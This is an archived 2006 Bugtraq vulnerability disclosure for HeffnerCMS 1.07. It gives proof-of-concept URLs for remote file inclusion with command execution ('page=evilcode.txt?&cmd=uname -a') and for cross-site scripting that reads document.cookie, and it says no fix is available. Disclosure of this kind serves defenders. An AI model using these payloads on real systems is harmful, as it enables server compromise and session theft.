lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20060324174726.20201.qmail@securityfocus.com>
Date: 24 Mar 2006 17:47:26 -0000
From: botan@...uxmail.org
To: bugtraq@...urityfocus.com
Subject: HeffnerCMS Remote Command Exucetion And Cross Scripting Attack


Website : http://www.christian-heffner.de

Version : 1.07

I.

<?php

  $filename="index.php";

  require_once 'vlib/vlibTemplate.php';

	$tmpl = new vlibTemplate('tmpl/std/index.tpl');
	
	require_once 'config/db_config.php';

	require_once 'config/pcfunctions.php';

Ucuyor.... :) lol

II. Vulnerable code ;


http://www.site.com/index.php?page=evilcode.txt?&cmd=uname -a

III. Cross Scripting Attack

http://www.site.com/index.php?page=<script>alert(document.cookie)</script>

http://www.site.com/index.php?page=<script>alert(Patriotic Hackers)</script>

Etc..

IV. Solution 

No

Greetz ; B3g0k,Azad,Nistiman,Hawar,Seyh and other our friends.. 

irc.gigachat.net #kurdhack

www.PatrioticHackers


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ